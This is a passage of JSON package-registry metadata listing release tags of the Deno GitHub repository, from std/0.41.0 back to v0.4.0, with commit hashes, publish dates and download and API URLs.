0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.